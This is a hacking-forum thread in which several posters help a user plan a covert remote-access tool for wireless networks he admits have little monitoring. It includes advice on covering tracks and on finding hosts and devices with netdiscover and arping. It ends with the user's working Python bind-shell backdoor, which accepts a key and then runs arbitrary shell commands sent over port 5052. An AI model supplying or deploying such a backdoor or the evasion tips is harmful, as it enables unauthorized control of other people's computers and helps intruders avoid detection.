Project Shebang

[N3mesis]

do you have any plans of concealing your identity? With your current plan it'd be pretty trivial to track you down. and with plans to put your real, static IP AND Hostname in the logs your screwed if anyone gets smart and realizes they were hacked. I suggest putting some thought into anonymity. I won't tell you how, but do some research and be creative


If you want to hack in todays world, covering your tracks is probably the most important thing you can do. otherwise you probably won't be hacking for very long

[frog]

Cool. Thanks again frog.



  Great advice. Shoulda done this before getting so specific. I am not done read this TCP/IP book i got but a quick question;

Instead of using MAC, could i just query the network's DNS server with my computer name?

Np dude, I help where I can. You can make requests to local dns servers for IP addresses but the server will log this and if you try spoofing dns replies depending on their dns server daemon they will be warned of it(mail, logs, w/e). I like the idea of using rarp better. link-layer vs. application-layer?

[proxx]

Cool. Thanks again frog.



  Great advice. Shoulda done this before getting so specific. I am not done read this TCP/IP book i got but a quick question;

Instead of using MAC, could i just query the network's DNS server with my computer name?

Well you said that you will be using it on a WLAN mostly which is not much different from something a regular LAN.
Using a fixed IP address is by far the easiest, very often sys admins tend to specify a DHCP pool from a certain starting point to an endpoint , any addresses not in that range will never be in use or are used for specific services etc.
But I understand that this isn't fancy enough

Since you are on the same LAN and we we wont have to bothered with things like NAT and other network horrors there is also no real reason to use a reverse connection , you can in this case flip the model and use the clients as servers.
Having them open a specific port and fetch the data yourself, this way they dont depend on a server on the network thus less things to go wrong.

Another idea might be to use mere force,  in the realm of computing ~250 or tenfolds are nothing.
It might be a little noisy but why not have the client attempt to connect to the entire range of addresses in the network.
Say the client is  on 192.168.100.173 and the server is on .058.
Just let the client attempt a connection to say port 32112 on the entire range from  0-254.
Within milliseconds it will hit the server and a connection is established.

Perhaps using things like broadcast or reverse DNS might be interesting protocols to investigate.
Keeping it KISS is the way to go no matter what you do

[DeXtreme]

Well you said that you will be using it on a WLAN mostly which is not much different from something a regular LAN.
Using a fixed IP address is by far the easiest, very often sys admins tend to specify a DHCP pool from a certain starting point to an endpoint , any addresses not in that range will never be in use or are used for specific services etc.
But I understand that this isn't fancy enough

Since you are on the same LAN and we we wont have to bothered with things like NAT and other network horrors there is also no real reason to use a reverse connection , you can in this case flip the model and use the clients as servers.
Having them open a specific port and fetch the data yourself, this way they dont depend on a server on the network thus less things to go wrong.

Another idea might be to use mere force,  in the realm of computing ~250 or tenfolds are nothing.
It might be a little noisy but why not have the client attempt to connect to the entire range of addresses in the network.
Say the client is  on 192.168.100.173 and the server is on .058.
Just let the client attempt a connection to say port 32112 on the entire range from  0-254.
Within milliseconds it will hit the server and a connection is established.

Perhaps using things like broadcast or reverse DNS might be interesting protocols to investigate.
Keeping it KISS is the way to go no matter what you do

True. Those could work but if remember correctly i tried assigning my own IP address and my laptop just plain refused to connect to the WLAN(What do you think could have caused that?). The networks i plan on using have little or no network monitoring so i'm taking advantage of that to be a little lose with the anonymity and focus on core functionality. Computer security isn't something taken very seriously here(Yay for me ) I think i'll write a different script for each method, just for the sake of learning.

[proxx]

True. Those could work but if remember correctly i tried assigning my own IP address and my laptop just plain refused to connect to the WLAN(What do you think could have caused that?). The networks i plan on using have little or no network monitoring so i'm taking advantage of that to be a little lose with the anonymity and focus on core functionality. Computer security isn't something taken very seriously here(Yay for me ) I think i'll write a different script for each method, just for the sake of learning.

On what OS was that ?
The way I know works is by using wpa_supplicant and just assigning a static IP with ifconfig, dont forget to add a route with route add.
I seen many GUI tools fucking that up.
The clean way to do it would be to see if arping responds on a certain IP address to make sure it is free so there wont be any conflicts.
Or fire up netdiscover before assigning an address, that way you will have a nice overview of the current pool connected to the AP, this will in turn give you all the MAC addresses on the network aswell it also does lookups for vendors which allow you to quickly pick out the phones etc etc.

[DeXtreme]

On what OS was that ?
The way I know works is by using wpa_supplicant and just assigning a static IP with ifconfig, dont forget to add a route with route add.
I seen many GUI tools fucking that up.
The clean way to do it would be to see if arping responds on a certain IP address to make sure it is free so there wont be any conflicts.
Or fire up netdiscover before assigning an address, that way you will have a nice overview of the current pool connected to the AP, this will in turn give you all the MAC addresses on the network aswell it also does lookups for vendors which allow you to quickly pick out the phones etc etc.

Kali Linux. I used the Networking GUI. Wasn't conversant with using  the CLI then so you're probably right.



Okay so I read up and wrote this script.Pretty simple really.Wrote it so to use it, first thing you have to send is the KEY. I'll write it in C next.

TODO:
Keep track of current directory

All suggestions are welcome

Code: (python) [Select]

import socket,subprocess

#create socket
s=socket.socket()
s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1)

#open port 5052 and listen for connections
s.bind(("",5052))
s.listen(5)

while 1:
    #accept connections
    con,addr=s.accept()
    con.settimeout(2000.0)

    #recieve the key
    key=con.recv(1024)
   
    while con and key=="XXX":
        try:
            #recieve command
            cmd=con.recv(1024)

            #execute command
            proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,\
                            stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            out,err=proc.communicate()

            #send output
            con.send(out+err)
        except:
            con.close()
            key=""
            break